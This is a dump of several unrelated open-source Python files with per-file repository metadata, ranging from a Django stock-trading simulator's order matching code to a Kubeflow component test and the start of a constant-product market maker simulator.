stock_symbol = models.CharField(max_length=12)
    commit_client = models.IntegerField(verbose_name='ID of the committing client')
commit_direction = models.CharField(max_length=1, default='b')
commit_price = models.DecimalField(max_digits=MAX_DIGITS, decimal_places=DECIMAL_PLACES, default=0)
commit_vol = models.IntegerField(default=0)
commit_date = models.DateTimeField(blank=True, default=None)
    # used to cancel a commission
    commission_to_cancel = models.UUIDField(verbose_name='UUID of the commission targeted for cancellation', default=uuid.uuid4)
# Confirm the commission
confirmed = models.BooleanField(default=False)
def is_valid(self):
"""
        Check whether the commission message is valid.
        :return: True if it is valid
"""
if not SimStock.objects.filter(symbol=self.stock_symbol).exists():
            # the committed stock does not exist
print('The STOCK COMMITTED DOES NOT EXIST!')
return False
else:
stock_corr = SimStock.objects.get(symbol=self.stock_symbol)
if stock_corr.limit_up != 0 and stock_corr.limit_down != 0:
if self.commit_price > stock_corr.limit_up or self.commit_price < stock_corr.limit_down:
                    # the commit price must lie between the limit-down and limit-up prices
print('COMMIT PRICE MUST BE BETWEEN THE LIMIT UP AND THE LIMIT DOWN!')
return False
if self.commit_direction not in ['a', 'b', 'c']:
            # the commit direction must be one of 'a' (sell), 'b' (buy) or 'c' (cancel)
print('COMMIT DIRECTION INVALID!')
return False
commit_client_object = BaseClient.objects.get(id=self.commit_client)
if self.commit_direction == 'a':
            # sell commission: the client must hold the stock with enough available volume
if not SimHoldingElem.objects.filter(owner=self.commit_client, stock_symbol=self.stock_symbol).exists():
print('DOES NOT HOLD THE STOCK!')
return False
holding_element = SimHoldingElem.objects.get(owner=self.commit_client, stock_symbol=self.stock_symbol)
if holding_element.available_vol < self.commit_vol:
print('DOES NOT HOLD ENOUGH STOCK SHARES!')
return False
elif self.commit_direction == 'b':
            # buy commission: the client must have enough flexible cash to cover the frozen amount plus tax
if commit_client_object.flexible_cash < self.commit_price * self.commit_vol * Decimal(1 + TAX_RATE):
print('CAN NOT AFFORD THE FROZEN CASH!')
return False
elif self.commit_direction == 'c':
            # cancel commission: it must reference an existing commission, which cancelling revokes
if self.commission_to_cancel is None:
print('COMMISSION CANCELED IS NONE!')
return False
return True
def sim_add_commission(msg):
"""
    The client successfully submitted a commission that was partly or fully untraded; update the client's commission records and the order book of the stock.
    :param msg: information about the commission, a CommissionMsg instance
"""
assert isinstance(msg, SimCommissionMsg)
assert msg.confirmed is True
principle = msg.commit_client
stock_symbol = msg.stock_symbol
market = SimMarket.objects.get(id=1)
order_book_entry, created = SimOrderBookEntry.objects.get_or_create(stock_symbol=stock_symbol,
entry_price=msg.commit_price,
entry_direction=msg.commit_direction)
order_book_entry.total_vol += msg.commit_vol
order_book_entry.save(update_fields=['total_vol'])
new_order_book_element = SimOrderBookElem.objects.create(entry_belonged=order_book_entry.id,
client=principle,
direction_committed=msg.commit_direction,
price_committed=msg.commit_price,
vol_committed=msg.commit_vol,
date_committed=market.datetime)
SimCommissionElem.objects.create(owner=principle, stock_symbol=stock_symbol, operation=msg.commit_direction,
price_committed=msg.commit_price, vol_committed=msg.commit_vol,
date_committed=market.datetime, unique_id=new_order_book_element.unique_id)
if msg.commit_direction == 'a':
        # sell commission
holding = SimHoldingElem.objects.get(owner=principle, stock_symbol=stock_symbol)
assert msg.commit_vol <= holding.available_vol
holding.frozen_vol += msg.commit_vol
holding.available_vol -= msg.commit_vol
holding.save(update_fields=['frozen_vol', 'available_vol'])
elif msg.commit_direction == 'b':
        # buy commission
principle_object = BaseClient.objects.get(id=principle)
freeze = float(msg.commit_price * msg.commit_vol)
assert freeze <= principle_object.flexible_cash
principle_object.frozen_cash += freeze
principle_object.flexible_cash -= freeze
principle_object.save(update_fields=['frozen_cash', 'flexible_cash'])
return True
def sim_order_book_matching(commission):
"""
    Match the commission submitted by the client against the orders in the order book.
"""
assert isinstance(commission, SimCommissionMsg)
assert commission.confirmed is False
stock_symbol = commission.stock_symbol
stock_object = SimStock.objects.get(symbol=stock_symbol)
direction = commission.commit_direction
remaining_vol = commission.commit_vol
market = SimMarket.objects.get(id=1)
if direction == 'a':
        # sell commission
matching_direction = 'b'
while not stock_object.is_order_book_empty(matching_direction):
best_element = stock_object.get_best_element(matching_direction)
if best_element.price_committed < commission.commit_price:
                # the price no longer qualifies; stop matching
break
if remaining_vol == 0:
                # the requested volume has been filled; stop matching
break
if remaining_vol >= best_element.vol_committed:
                # a trade occurs: this order book entry is fully filled
trade_message = SimTradeMsg(stock_symbol=stock_symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=best_element.vol_committed, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
                # these two updates should conceptually happen in parallel
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
                # record the trade and delete the filled order from the order book
stock_object.trading_behaviour(direction, best_element.price_committed, best_element.vol_committed,
trade_message.trade_date, trade_message.trade_tick)
remaining_vol -= best_element.vol_committed
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= best_element.vol_committed
if best_entry.total_vol == 0:
best_entry.delete()
else:
best_entry.save(update_fields=['total_vol'])
best_element.delete()
else:
                # a trade occurs: this order book entry is partially filled
trade_message = SimTradeMsg(stock_symbol=stock_symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=remaining_vol, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
                # these two updates should conceptually happen in parallel
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
                # record the trade and adjust the remaining order in the order book
stock_object.trading_behaviour(direction, best_element.price_committed, remaining_vol,
trade_message.trade_date, trade_message.trade_tick)
best_element.vol_committed -= remaining_vol
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= remaining_vol
remaining_vol = 0
best_element.save(update_fields=['vol_committed'])
best_entry.save(update_fields=['total_vol'])
elif direction == 'b':
        # buy commission
matching_direction = 'a'
while not stock_object.is_order_book_empty(matching_direction):
best_element = stock_object.get_best_element(matching_direction)
if best_element.price_committed > commission.commit_price:
                # the price no longer qualifies; stop matching
break
if remaining_vol == 0:
                # the requested volume has been filled; stop matching
break
if remaining_vol >= best_element.vol_committed:
                # a trade occurs: this order book entry is fully filled
trade_message = SimTradeMsg(stock_symbol=stock_symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=best_element.vol_committed, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
                # these two updates should conceptually happen in parallel
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
                # record the trade and delete the filled order from the order book
stock_object.trading_behaviour(direction, best_element.price_committed, best_element.vol_committed,
trade_message.trade_date, trade_message.trade_tick)
remaining_vol -= best_element.vol_committed
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= best_element.vol_committed
if best_entry.total_vol == 0:
best_entry.delete()
else:
best_entry.save(update_fields=['total_vol'])
best_element.delete()
else:
                # a trade occurs: this order book entry is partially filled
trade_message = SimTradeMsg(stock_symbol=stock_object.symbol, initiator=commission.commit_client,
trade_direction=direction, trade_price=best_element.price_committed,
trade_vol=remaining_vol, acceptor=best_element.client,
commission_id=best_element.unique_id, tax_charged=0,
trade_date=market.datetime, trade_tick=market.tick)
                # these two updates should conceptually happen in parallel
sim_instant_trade(trade_message)
sim_delayed_trade(trade_message)
                # record the trade and adjust the remaining order in the order book
stock_object.trading_behaviour(direction, best_element.price_committed, remaining_vol,
trade_message.trade_date, trade_message.trade_tick)
best_element.vol_committed -= remaining_vol
best_entry = SimOrderBookEntry.objects.get(id=best_element.entry_belonged)
best_entry.total_vol -= remaining_vol
remaining_vol = 0
best_element.save(update_fields=['vol_committed'])
best_entry.save(update_fields=['total_vol'])
elif direction == 'c':
        # cancel a commission
assert commission.commission_to_cancel is not None
order_book_element_corr = SimOrderBookElem.objects.get(unique_id=commission.commission_to_cancel)
try:
assert commission.commit_client == order_book_element_corr.client
            assert commission.commit_vol <= order_book_element_corr.vol_committed  # volume requested to cancel
order_book_entry = SimOrderBookEntry.objects.get(id=order_book_element_corr.entry_belonged)
order_book_entry.total_vol -= commission.commit_vol
order_book_element_corr.vol_committed -= commission.commit_vol
if order_book_element_corr.vol_committed == 0:
order_book_element_corr.delete()
else:
order_book_element_corr.save(update_fields=['vol_committed'])
if order_book_entry.total_vol == 0:
order_book_entry.delete()
else:
order_book_entry.save(update_fields=['total_vol'])
            # cancellation succeeded: update the commission record and release the frozen assets
origin_commission = SimCommissionElem.objects.get(unique_id=commission.commission_to_cancel)
if origin_commission.operation == 'a':
holding = SimHoldingElem.objects.get(owner=commission.commit_client, stock_symbol=stock_symbol)
holding.frozen_vol -= commission.commit_vol
holding.available_vol += commission.commit_vol
holding.save(update_fields=['frozen_vol', 'available_vol'])
else:
assert origin_commission.operation == 'b'
freeze = float(commission.commit_price * commission.commit_vol)
client_object = BaseClient.objects.get(id=commission.commit_client)
client_object.frozen_cash -= freeze
client_object.flexible_cash += freeze
client_object.save(update_fields=['frozen_cash', 'flexible_cash'])
origin_commission.vol_committed -= commission.commit_vol
if origin_commission.vol_traded == origin_commission.vol_committed:
origin_commission.delete()
else:
origin_commission.save(update_fields=['vol_committed'])
except AssertionError:
print("撤单失败!")
commission.confirmed = True
commission.save()
return True
else:
raise ValueError
if remaining_vol > 0:
        # the order book cannot fill the whole order, or the remaining orders do not qualify
commission.commit_vol = remaining_vol
commission.confirmed = True
ok = sim_add_commission(commission)
assert ok
else:
commission.confirmed = True
return True
def sim_commission_handler(new_commission, handle_info=False):
"""
    Commission handler: if the received commission message is valid, create commission records,
    update the order book and record transactions in the database as appropriate.
    :param new_commission: the newly received commission message
    :param handle_info: whether to print info about the handled commission
"""
time0 = time.time()
assert isinstance(new_commission, SimCommissionMsg)
if not new_commission.is_valid():
return False
sim_order_book_matching(new_commission)
assert new_commission.confirmed
time1 = time.time()
if handle_info:
print('Commission Handled: symbol-{} {} price-{} vol-{}, Cost {} s.'.format(new_commission.stock_symbol,
new_commission.commit_direction,
new_commission.commit_price,
new_commission.commit_vol,
time1 - time0))
return True
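# Hedged usage sketch (added; not part of the original module, the field
# values are illustrative):
# msg = SimCommissionMsg(stock_symbol='SIM', commit_client=1,
#                        commit_direction='b', commit_price=Decimal('10.00'),
#                        commit_vol=100)
# sim_commission_handler(msg, handle_info=True)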
| 45.864173 | 120 | 0.621057 | 3,628 | 0.145254 | 0 | 0 | 0 | 0 | 0 | 0 | 3,876 | 0.155183 |
9eb25cb35ba11321a4478f3939055dd02c0dd60a | 906 | py | Python | project/project3/tests/q3_2_3.py | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
]
| null | null | null | project/project3/tests/q3_2_3.py | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
]
| null | null | null | project/project3/tests/q3_2_3.py | ds-modules/Colab-demo | cccaff13633f8a5ec697cd4aeca9087f2feec2e4 | [
"BSD-3-Clause"
]
| null | null | null | test = { 'name': 'q3_2_3',
'points': 1,
'suites': [ { 'cases': [ { 'code': '>>> # this test just checks that your classify_feature_row works correctly.;\n'
'>>> def check(r):\n'
'... t = test_my_features.row(r)\n'
"... return classify(t, train_my_features, train_movies.column('Genre'), 13) == classify_feature_row(t);\n"
'>>> all([check(i) for i in np.arange(13)])\n'
'True',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
| 60.4 | 158 | 0.324503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 406 | 0.448124 |
9eb59f13f0ec2dce6a8b666bbd3d7c93b0067e02 | 695 | py | Python | Lib/email/mime/nonmultipart.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
]
| 1 | 2018-06-21T18:21:24.000Z | 2018-06-21T18:21:24.000Z | Lib/email/mime/nonmultipart.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
]
| null | null | null | Lib/email/mime/nonmultipart.py | sireliah/polish-python | 605df4944c2d3bc25f8bf6964b274c0a0d297cc3 | [
"PSF-2.0"
]
| null | null | null | # Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: [email protected]
"""Base klasa dla MIME type messages that are nie multipart."""
__all__ = ['MIMENonMultipart']
z email zaimportuj errors
z email.mime.base zaimportuj MIMEBase
klasa MIMENonMultipart(MIMEBase):
"""Base klasa dla MIME non-multipart type messages."""
def attach(self, payload):
# The public API prohibits attaching multiple subparts to MIMEBase
# derived subtypes since none of them are, by definition, of content
# type multipart/*
podnieś errors.MultipartConversionError(
'Cannot attach additional subparts to non-multipart/*')
| 30.217391 | 76 | 0.719424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 446 | 0.640805 |
9eb647f3ff599f7fe9aba98c470407028b7ff5b5 | 682 | py | Python | notifications/providers/slack.py | danidee10/django-notifs | 2712aad90ee1cc7b6735dad6e311e4df6a02b843 | [
"MIT"
]
| 145 | 2017-06-22T20:37:14.000Z | 2022-02-03T21:18:28.000Z | notifications/providers/slack.py | danidee10/django-notifs | 2712aad90ee1cc7b6735dad6e311e4df6a02b843 | [
"MIT"
]
| 67 | 2017-06-23T06:53:32.000Z | 2021-11-13T04:00:27.000Z | notifications/providers/slack.py | danidee10/django-notifs | 2712aad90ee1cc7b6735dad6e311e4df6a02b843 | [
"MIT"
]
| 24 | 2017-06-22T20:37:17.000Z | 2022-02-17T19:52:35.000Z | from notifications import ImproperlyInstalledNotificationProvider
try:
from slack_sdk import WebClient
except ImportError as err:
raise ImproperlyInstalledNotificationProvider(
missing_package='slack_sdk', provider='slack'
) from err
from notifications import default_settings as settings
from . import BaseNotificationProvider
class SlackNotificationProvider(BaseNotificationProvider):
name = 'slack'
    def __init__(self, context=None):
        # avoid a shared mutable default argument for the context dict
        context = context if context is not None else {}
        self.slack_client = WebClient(token=settings.NOTIFICATIONS_SLACK_BOT_TOKEN)
        super().__init__(context=context)
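    # Example payload (added; the keys mirror slack_sdk's chat_postMessage
    # keyword arguments): {"channel": "#general", "text": "Hello"}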
def send(self, payload):
self.slack_client.chat_postMessage(**payload)
| 28.416667 | 83 | 0.771261 | 328 | 0.480938 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.036657 |
9eb6d151f5528cdc1c322f9b0068d09d6d965dbb | 114 | py | Python | pinax/points/signals.py | hacklabr/pinax-points | 1133c6d911e9fe9445ff45aebe118bcaf715aae0 | [
"MIT"
]
| 28 | 2015-01-26T07:52:49.000Z | 2022-03-20T17:15:04.000Z | pinax/points/signals.py | hacklabr/pinax-points | 1133c6d911e9fe9445ff45aebe118bcaf715aae0 | [
"MIT"
]
| 15 | 2017-12-04T07:35:49.000Z | 2020-05-21T15:53:20.000Z | pinax/points/signals.py | hacklabr/pinax-points | 1133c6d911e9fe9445ff45aebe118bcaf715aae0 | [
"MIT"
]
| 14 | 2015-02-10T04:27:12.000Z | 2021-10-05T10:27:21.000Z | from django.dispatch import Signal
points_awarded = Signal(providing_args=["target", "key", "points", "source"])
| 28.5 | 77 | 0.745614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.254386 |
9eb729a54e82db494828c16cbebb47a4ee3adfae | 1,798 | py | Python | symplyphysics/laws/nuclear/fast_non_leakage_probability_from_fermi_age.py | blackyblack/symplyphysics | 4a22ceb7ffbdd8a0b2623a09bfb1a8febf541e4f | [
"MIT"
]
| null | null | null | symplyphysics/laws/nuclear/fast_non_leakage_probability_from_fermi_age.py | blackyblack/symplyphysics | 4a22ceb7ffbdd8a0b2623a09bfb1a8febf541e4f | [
"MIT"
]
| null | null | null | symplyphysics/laws/nuclear/fast_non_leakage_probability_from_fermi_age.py | blackyblack/symplyphysics | 4a22ceb7ffbdd8a0b2623a09bfb1a8febf541e4f | [
"MIT"
]
| null | null | null | from sympy.functions import exp
from symplyphysics import (
symbols, Eq, pretty, solve, Quantity, units, S,
Probability, validate_input, expr_to_quantity, convert_to
)
# Description
## Pfnl (fast non-leakage factor) is the ratio of the number of fast neutrons that do not leak from the reactor
## core during the slowing down process to the number of fast neutrons produced by fissions at all energies.
## Law: Pfnl ≈ e^(-Bg^2 * τth)
## Where:
## e - Euler's number, the base of the natural exponential.
## Bg^2 - geometric buckling.
## See [geometric buckling](./buckling/geometric_buckling_from_neutron_flux.py) implementation.
## τth - neutron Fermi age.
## The Fermi age is related to the distance traveled during moderation, just as the diffusion length is for
## thermal neutrons. The Fermi age is the same quantity as the slowing-down length squared (Ls^2).
## Pfnl - fast non-leakage probability.
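## Worked example (added for illustration; the numbers are representative):
## with Bg^2 = 1e-4 cm^-2 and τth = 27 cm^2 (roughly the Fermi age of light
## water), Pfnl = e^(-0.0027) ≈ 0.9973.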
geometric_buckling = symbols('geometric_buckling')
neutron_fermi_age = symbols('neutron_fermi_age')
fast_non_leakage_probability = symbols('fast_non_leakage_probability')
law = Eq(fast_non_leakage_probability, exp(-1 * geometric_buckling * neutron_fermi_age))
def print():
return pretty(law, use_unicode=False)
@validate_input(geometric_buckling_=(1 / units.length**2), neutron_fermi_age_=units.length**2)
def calculate_probability(geometric_buckling_: Quantity, neutron_fermi_age_: Quantity) -> Probability:
result_probability_expr = solve(law, fast_non_leakage_probability, dict=True)[0][fast_non_leakage_probability]
result_expr = result_probability_expr.subs({
geometric_buckling: geometric_buckling_,
neutron_fermi_age: neutron_fermi_age_})
result_factor = expr_to_quantity(result_expr, 'fast_non_leakage_factor')
return Probability(convert_to(result_factor, S.One).n())
| 47.315789 | 114 | 0.775306 | 0 | 0 | 0 | 0 | 596 | 0.330744 | 0 | 0 | 790 | 0.438402 |
9eb7a903f72b60e9e3df9e532475115dd09aef7e | 599 | py | Python | 3. Python Advanced (September 2021)/3.1 Python Advanced (September 2021)/12. Exercise - File Handling/02_line_numbers.py | kzborisov/SoftUni | ccb2b8850adc79bfb2652a45124c3ff11183412e | [
"MIT"
]
| 1 | 2021-02-07T07:51:12.000Z | 2021-02-07T07:51:12.000Z | 3. Python Advanced (September 2021)/3.1 Python Advanced (September 2021)/12. Exercise - File Handling/02_line_numbers.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
]
| null | null | null | 3. Python Advanced (September 2021)/3.1 Python Advanced (September 2021)/12. Exercise - File Handling/02_line_numbers.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
]
| null | null | null | import re
def count_letters(text):
return len(re.findall(r"[a-zA-Z]", text))
def count_punctuation(text):
return len([x for x in text if x in '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'])
lines = []
with open("text.txt", "r") as f:
content = f.readlines()
for index, line in enumerate(content):
letters_count = count_letters(line)
punctuation = count_punctuation(line)
line = line.strip("\n")
lines.append(f"Line {index + 1}: {line} ({letters_count})({punctuation})\n")
with open("output.txt", "w") as f:
for line in lines:
f.write(line)
| 23.96 | 84 | 0.580968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 141 | 0.235392 |
9eb81dc7bd07da6f0a064dae1f82cb5f9f4c811b | 422 | py | Python | app/auth/forms.py | jakhax/esp9266_rfid_lock | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
]
| 2 | 2020-11-10T09:16:21.000Z | 2021-12-15T07:27:17.000Z | app/auth/forms.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
]
| null | null | null | app/auth/forms.py | jakhax/consecutive_normal_punches | e9c25628a023c8d6005a136e240ca1a36589fd36 | [
"MIT"
]
| null | null | null | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, BooleanField, PasswordField
from wtforms.validators import DataRequired, Length
class LoginForm(FlaskForm):
username = StringField('username', validators=[DataRequired(), Length(1, 32)])
password = PasswordField('Password', validators=[DataRequired()])
remember = BooleanField('Remember me')
submit = SubmitField('Log in') | 46.888889 | 82 | 0.779621 | 258 | 0.611374 | 0 | 0 | 0 | 0 | 0 | 0 | 41 | 0.097156 |
9eb981e2b99c90652643fa12268a2ebf31a607f2 | 929 | py | Python | hub/sensorhub/models/user_agent.py | kblum/sensor-hub | 6b766ca59be74ae1a8d3d42afe048d04b6a0c546 | [
"MIT"
]
| null | null | null | hub/sensorhub/models/user_agent.py | kblum/sensor-hub | 6b766ca59be74ae1a8d3d42afe048d04b6a0c546 | [
"MIT"
]
| null | null | null | hub/sensorhub/models/user_agent.py | kblum/sensor-hub | 6b766ca59be74ae1a8d3d42afe048d04b6a0c546 | [
"MIT"
]
| null | null | null | from django.db import models
from . import TimestampedModel
class UserAgent(TimestampedModel):
"""
Representation of HTTP user agent string from reading API request.
Exists as a separate model for database normalisation.
"""
user_agent_string = models.TextField(db_index=True, unique=True, null=False, blank=False)
@staticmethod
def get_or_create_user_agent(user_agent_string, save=False):
if not user_agent_string:
return None
try:
# attempt to load user agent from user agent string
return UserAgent.objects.get(user_agent_string=user_agent_string)
except UserAgent.DoesNotExist:
# create new user agent
user_agent = UserAgent(user_agent_string=user_agent_string)
if save:
user_agent.save()
return user_agent
def __str__(self):
return self.user_agent_string
| 32.034483 | 93 | 0.678149 | 866 | 0.932185 | 0 | 0 | 523 | 0.562971 | 0 | 0 | 215 | 0.231432 |
9eb9fac0aba71cd2544a8102ad03715608f8d6b1 | 428 | py | Python | sortingAlgorithm/pigeonHoleSort.py | slowy07/pythonApps | 22f9766291dbccd8185035745950c5ee4ebd6a3e | [
"MIT"
]
| 10 | 2020-10-09T11:05:18.000Z | 2022-02-13T03:22:10.000Z | sortingAlgorithm/pigeonHoleSort.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
]
| null | null | null | sortingAlgorithm/pigeonHoleSort.py | khairanabila/pythonApps | f90b8823f939b98f7bf1dea7ed35fe6e22e2f730 | [
"MIT"
]
| 6 | 2020-11-26T12:49:43.000Z | 2022-03-06T06:46:43.000Z | def pigeonHoleSort(nums):
minNumbers = min(nums)
maxNumbers = max(nums)
size = maxNumbers - minNumbers + 1
holes = [0] * size
for x in nums:
holes[x - minNumbers] += 1
i = 0
for count in range(size):
while holes[count] > 0:
holes[count] -= 1
nums[i] = count + minNumbers
            i += 1
    return nums
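# Note (added): pigeonhole sort runs in O(n + k) time and O(k) extra space,
# where k = max - min + 1, so it is best suited to dense integer ranges.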
nums = [12,26,77,22,88,1]
print(pigeonHoleSort(nums))
print(nums)
| 20.380952 | 40 | 0.546729 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
9eba0cf24a0b17206785479fbe34def5787d6765 | 345 | py | Python | service/utils/parsers.py | psorianom/csv_detective_api | 7c96f497374d842226a95a26cb6627ac22cd799b | [
"MIT"
]
| 2 | 2020-02-04T05:24:56.000Z | 2021-05-05T17:22:55.000Z | service/utils/parsers.py | psorianom/csv_detective_api | 7c96f497374d842226a95a26cb6627ac22cd799b | [
"MIT"
]
| 10 | 2019-10-24T13:29:59.000Z | 2022-02-26T17:06:15.000Z | service/utils/parsers.py | psorianom/csv_detective_api | 7c96f497374d842226a95a26cb6627ac22cd799b | [
"MIT"
]
| 2 | 2019-12-30T23:26:53.000Z | 2020-03-27T17:23:28.000Z | # parsers.py
from werkzeug.datastructures import FileStorage
from flask_restplus import reqparse
file_upload = reqparse.RequestParser()
file_upload.add_argument('resource_csv',
type=FileStorage,
location='files',
required=True,
help='CSV file') | 34.5 | 47 | 0.585507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 43 | 0.124638 |
9ebb0d752144dce45cafae8a4dd28aecf263593a | 4,410 | py | Python | sdk/python/kfp/components/yaml_component_test.py | johnmacnamararseg/pipelines | 340318625c527836af1c9abc0fd0d76c0a466333 | [
"Apache-2.0"
]
| null | null | null | sdk/python/kfp/components/yaml_component_test.py | johnmacnamararseg/pipelines | 340318625c527836af1c9abc0fd0d76c0a466333 | [
"Apache-2.0"
]
| 1 | 2020-02-06T12:53:44.000Z | 2020-02-06T12:53:44.000Z | sdk/python/kfp/components/yaml_component_test.py | johnmacnamararseg/pipelines | 340318625c527836af1c9abc0fd0d76c0a466333 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2021 The Kubeflow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for kfp.components.yaml_component."""
import os
import tempfile
import textwrap
import unittest
from unittest import mock
import requests
from kfp.components import structures
from kfp.components import yaml_component
SAMPLE_YAML = textwrap.dedent("""\
components:
comp-component-1:
executorLabel: exec-component-1
inputDefinitions:
parameters:
input1:
parameterType: STRING
outputDefinitions:
parameters:
output1:
parameterType: STRING
deploymentSpec:
executors:
exec-component-1:
container:
command:
- sh
- -c
- 'set -ex
echo "$0" > "$1"'
- '{{$.inputs.parameters[''input1'']}}'
- '{{$.outputs.parameters[''output1''].output_file}}'
image: alpine
pipelineInfo:
name: component-1
root:
dag:
tasks:
component-1:
cachingOptions:
enableCache: true
componentRef:
name: comp-component-1
inputs:
parameters:
input1:
componentInputParameter: input1
taskInfo:
name: component-1
inputDefinitions:
parameters:
input1:
parameterType: STRING
schemaVersion: 2.1.0
sdkVersion: kfp-2.0.0-alpha.3
""")
class YamlComponentTest(unittest.TestCase):
def test_load_component_from_text(self):
component = yaml_component.load_component_from_text(SAMPLE_YAML)
self.assertEqual(component.component_spec.name, 'component-1')
self.assertEqual(component.component_spec.outputs,
{'output1': structures.OutputSpec(type='String')})
self.assertEqual(component._component_inputs, {'input1'})
self.assertEqual(component.name, 'component-1')
self.assertEqual(
component.component_spec.implementation.container.image, 'alpine')
def test_load_component_from_file(self):
with tempfile.TemporaryDirectory() as tmpdir:
path = os.path.join(tmpdir, 'sample_yaml.yaml')
with open(path, 'w') as f:
f.write(SAMPLE_YAML)
component = yaml_component.load_component_from_file(path)
self.assertEqual(component.component_spec.name, 'component-1')
self.assertEqual(component.component_spec.outputs,
{'output1': structures.OutputSpec(type='String')})
self.assertEqual(component._component_inputs, {'input1'})
self.assertEqual(component.name, 'component-1')
self.assertEqual(
component.component_spec.implementation.container.image, 'alpine')
def test_load_component_from_url(self):
component_url = 'https://raw.githubusercontent.com/some/repo/components/component_group/component.yaml'
def mock_response_factory(url, params=None, **kwargs):
if url == component_url:
response = requests.Response()
response.url = component_url
response.status_code = 200
response._content = SAMPLE_YAML
return response
raise RuntimeError('Unexpected URL "{}"'.format(url))
with mock.patch('requests.get', mock_response_factory):
component = yaml_component.load_component_from_url(component_url)
self.assertEqual(component.component_spec.name, 'component-1')
self.assertEqual(component.component_spec.outputs,
{'output1': structures.OutputSpec(type='String')})
self.assertEqual(component._component_inputs, {'input1'})
self.assertEqual(component.name, 'component-1')
self.assertEqual(
component.component_spec.implementation.container.image,
'alpine')
if __name__ == '__main__':
unittest.main()
| 34.453125 | 111 | 0.654649 | 2,493 | 0.565306 | 0 | 0 | 0 | 0 | 0 | 0 | 1,966 | 0.445805 |
9ebbdb1a7760f5a35b7e2094efb06933644ff5ca | 10,548 | py | Python | cpmm.py | wallfair-organization/amm-sim | 0ae8584563dd44162a8e2407382d250b02474704 | [
"MIT"
]
| null | null | null | cpmm.py | wallfair-organization/amm-sim | 0ae8584563dd44162a8e2407382d250b02474704 | [
"MIT"
]
| null | null | null | cpmm.py | wallfair-organization/amm-sim | 0ae8584563dd44162a8e2407382d250b02474704 | [
"MIT"
]
| null | null | null | #
# Constant Product Market Making Simulator
#
# simulate different liquidity provision and trading strategies
#
from typing import Tuple
import csv
import numpy as np
import pandas as pd
from numpy.random import default_rng
# TODO: switch to decimal type and control quantization. numeric errors will kill us quickly
class CPMM(object):
def __init__(self, fee_fraction = 0, fee_to_liquidity_fraction = 0) -> None:
# assert(fee_fraction >= fee_to_liquidity_fraction)
# amount of initial liquidity provided
self.initial_liquidity = 0
# total amount of liquidity
self.liquidity = 0
# total amount of collateral token
self.lp_token = 0
# yes tokens in the pool
self.lp_yes = 0
# no tokens in the pool
self.lp_no = 0
# outstanding tokens held by LP
self.outstanding_yes = 0
self.outstanding_no = 0
self.fee_pool = 0
self.history = []
self.fee_fraction = fee_fraction
        self.fee_to_liquidity_fraction = fee_to_liquidity_fraction # how much from the fee is reinvested to liquidity provision
def create_event(self, intial_liquidity, initial_yes_to_no = 1) -> Tuple[int, float]:
assert(initial_yes_to_no > 0)
self.initial_liquidity = intial_liquidity
rv = self._add_liquidity(intial_liquidity, initial_yes_to_no)
n_p = self.lp_yes / self.lp_no
# print(f"invariant P {initial_yes_to_no} {n_p}")
assert(abs(initial_yes_to_no - n_p) < 0.000001)
return rv
def add_liquidity(self, amount) -> Tuple[int, float]:
assert(self.lp_token > 0)
# yes to no must be invariant when liquidity is added
p = self.lp_yes / self.lp_no
rv = self._add_liquidity(amount, p)
n_p = self.lp_yes / self.lp_no
# assert invariant, we use float and disregard rounding so must be within e ~ 0
# print(f"invariant P {p} {n_p}")
assert(abs(p - n_p) < 0.000001)
return rv
def _add_liquidity(self, amount, yes_to_no) -> Tuple[int, float]:
# print("adding liquidity:", amount)
self.liquidity += amount
self.lp_token += amount
# get token type from the ratio
